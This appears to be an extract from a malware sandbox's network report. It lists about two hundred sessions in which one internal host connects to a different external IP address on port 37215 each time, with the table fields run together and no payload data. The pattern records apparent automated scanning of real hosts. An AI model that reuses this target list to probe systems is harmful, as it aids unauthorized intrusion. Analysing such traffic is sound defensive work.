                                                                            9312192.168.2.1549984197.112.218.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9313192.168.2.1556296197.171.202.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9314192.168.2.1532832197.101.61.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9315192.168.2.1545452197.119.181.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9316192.168.2.1539256197.15.17.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9317192.168.2.1538570197.239.101.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9318192.168.2.1550006197.233.120.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9319192.168.2.1546890197.168.155.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9320192.168.2.1538042197.107.82.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9321192.168.2.1542310197.230.150.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9322192.168.2.1547656197.243.161.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9323192.168.2.1545358197.91.247.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9324192.168.2.1533198197.147.127.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9325192.168.2.1555520197.94.162.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9326192.168.2.1534458197.220.222.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9327192.168.2.1543896197.19.135.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9328192.168.2.1549260197.192.19.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9329192.168.2.1543940197.225.119.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9330192.168.2.1559174197.43.13.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9331192.168.2.1556832197.104.132.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9332192.168.2.1556784197.237.117.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9333192.168.2.1533304197.12.236.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9334192.168.2.1540678197.47.167.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9335192.168.2.1546158197.184.89.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9336192.168.2.1542778197.195.66.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9337192.168.2.1550444197.4.45.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9338192.168.2.1558318156.6.142.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9339192.168.2.1538450156.38.66.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9340192.168.2.1534472156.49.111.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9341192.168.2.1549090156.218.102.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9342192.168.2.1542930156.221.32.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9343192.168.2.1537526156.46.22.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9344192.168.2.1556012156.163.94.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9345192.168.2.1551160156.97.122.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9346192.168.2.1540820156.230.11.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9347192.168.2.1553582156.211.73.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9348192.168.2.1546066156.253.97.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9349192.168.2.1553542156.224.45.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9350192.168.2.1537930156.247.188.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9351192.168.2.1558492156.240.231.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9352192.168.2.1534330156.106.206.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9353192.168.2.1537728156.52.181.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9354192.168.2.1559806156.42.51.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9355192.168.2.1548136156.104.81.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9356192.168.2.1550254156.83.169.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9357192.168.2.1543142156.88.228.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9358192.168.2.1546408156.125.82.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9359192.168.2.1542042156.233.222.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9360192.168.2.1542028156.18.186.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9361192.168.2.1549946156.72.118.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9362192.168.2.1547228156.115.23.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9363192.168.2.1551946156.207.164.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9364192.168.2.1554844156.249.230.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9365192.168.2.1548424156.74.228.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9366192.168.2.1549202156.156.99.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9367192.168.2.1546354156.54.213.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9368192.168.2.1546776156.254.70.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9369192.168.2.1536854156.110.253.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9370192.168.2.1545902156.102.86.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9371192.168.2.1540008156.254.53.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9372192.168.2.1557194156.252.233.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9373192.168.2.1534650156.78.50.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9374192.168.2.1558528156.20.128.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9375192.168.2.1539038156.232.69.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9376192.168.2.1553742156.183.176.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9377192.168.2.1551204156.134.232.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9378192.168.2.1539254156.35.64.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9379192.168.2.1555744156.1.222.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9380192.168.2.1555220156.189.226.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9381192.168.2.1552414156.206.97.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9382192.168.2.1556160156.16.69.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9383192.168.2.1555940156.219.21.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9384192.168.2.1542010156.126.76.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9385192.168.2.1552002156.6.208.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9386192.168.2.1534174156.161.26.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9387192.168.2.1546524156.24.60.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9388192.168.2.1544176156.13.57.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9389192.168.2.1556234156.138.92.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9390192.168.2.1533278156.45.108.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9391192.168.2.1555924156.57.13.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9392192.168.2.1547656156.204.219.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9393192.168.2.1547170156.190.47.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9394192.168.2.1548104156.101.218.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9395192.168.2.1559410156.207.146.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9396192.168.2.1549406156.106.168.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9397192.168.2.1539096156.194.115.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9398192.168.2.1539758156.120.182.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9399192.168.2.1542630156.7.244.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9400192.168.2.1557342156.170.83.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9401192.168.2.1552536156.142.32.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9402192.168.2.1536328156.62.153.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9403192.168.2.1547164156.252.134.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9404192.168.2.1556278156.155.50.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9405192.168.2.1548508156.1.174.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9406192.168.2.1555348156.58.214.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9407192.168.2.1559908156.227.8.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9408192.168.2.1549778156.132.52.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9409192.168.2.1544990156.51.151.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9410192.168.2.1549916156.185.146.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9411192.168.2.1550138156.199.131.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9412192.168.2.1541554156.113.8.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9413192.168.2.1557928156.163.213.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9414192.168.2.1554972156.8.69.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9415192.168.2.1543896156.186.81.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9416192.168.2.1545476156.71.152.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9417192.168.2.1551670156.76.239.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9418192.168.2.1545120156.238.14.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9419192.168.2.1540184156.58.226.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9420192.168.2.1535028156.50.34.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9421192.168.2.1547786156.241.77.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9422192.168.2.1544286156.40.131.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9423192.168.2.1544296156.186.245.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9424192.168.2.1546450156.216.33.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9425192.168.2.1542372156.159.51.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9426192.168.2.1555346156.138.31.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9427192.168.2.1559520156.28.215.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9428192.168.2.1548964156.38.2.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9429192.168.2.1550132156.85.100.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9430192.168.2.1541918156.121.43.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9431192.168.2.1550018156.87.238.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9432192.168.2.1542494156.229.13.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9433192.168.2.1534548156.205.27.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9434192.168.2.1541188156.106.147.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9435192.168.2.1546910156.198.18.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9436192.168.2.1555876156.241.79.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9437192.168.2.1546426156.215.79.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9438192.168.2.1537986156.60.91.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9439192.168.2.1542252156.216.135.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9440192.168.2.1557400156.70.188.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9441192.168.2.1544524156.197.22.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9442192.168.2.1551118156.171.63.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9443192.168.2.1551422156.17.40.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9444192.168.2.1549600156.64.54.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9445192.168.2.1544028156.203.165.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9446192.168.2.1559268156.129.227.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9447192.168.2.1556312156.205.69.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9448192.168.2.1535852156.175.101.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9449192.168.2.1555058156.15.28.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9450192.168.2.1552102156.211.75.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9451192.168.2.1553180156.18.39.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9452192.168.2.1551386156.1.130.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9453192.168.2.1535082156.221.205.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9454192.168.2.1547718156.122.103.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9455192.168.2.1559626156.173.207.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9456192.168.2.1556094156.85.182.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9457192.168.2.1537166156.221.181.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9458192.168.2.1548248156.13.106.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9459192.168.2.1547320156.155.113.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9460192.168.2.1552142156.30.63.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9461192.168.2.1552448156.47.176.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9462192.168.2.1560900156.236.153.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9463192.168.2.1541842156.153.109.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9464192.168.2.1541510156.44.9.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9465192.168.2.1544646156.152.43.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9466192.168.2.1537570156.247.96.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9467192.168.2.1533938156.235.72.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9468192.168.2.1536792156.4.85.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9469192.168.2.1544154156.17.35.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9470192.168.2.1533286156.235.7.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9471192.168.2.1546380156.243.58.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9472192.168.2.154205841.228.210.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9473192.168.2.155289641.241.96.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9474192.168.2.155869641.56.124.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9475192.168.2.154566041.44.240.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9476192.168.2.155315441.68.246.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9477192.168.2.154590641.210.248.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9478192.168.2.155644641.33.188.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9479192.168.2.154343241.210.178.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9480192.168.2.154776641.101.192.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9481192.168.2.155412641.103.160.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9482192.168.2.155253641.104.199.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9483192.168.2.154568641.147.227.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9484192.168.2.155723241.127.150.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9485192.168.2.155929241.231.179.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9486192.168.2.154140641.194.237.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9487192.168.2.154669241.112.14.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9488192.168.2.156039241.150.248.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9489192.168.2.155215641.106.60.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9490192.168.2.155747041.43.2.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9491192.168.2.155978041.83.177.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9492192.168.2.153316041.238.210.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9493192.168.2.154054441.175.31.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9494192.168.2.155026641.253.141.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9495192.168.2.153564241.160.97.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9496192.168.2.153581441.45.106.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9497192.168.2.155903841.39.180.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9498192.168.2.155686041.103.102.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9499192.168.2.154595841.80.192.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9500192.168.2.155042841.198.24.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9501192.168.2.153641641.255.185.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9502192.168.2.154816641.36.221.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9503192.168.2.154408241.50.212.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9504192.168.2.154494441.25.95.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9505192.168.2.155214241.124.75.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9506192.168.2.155184441.173.177.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9507192.168.2.154989041.152.175.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9508192.168.2.154725641.248.16.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9509192.168.2.153521441.193.200.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9510192.168.2.153494641.161.169.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9511192.168.2.154829841.215.122.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9512192.168.2.153370441.0.138.15437215
                                                                            TimestampBytes transferredDirectionData


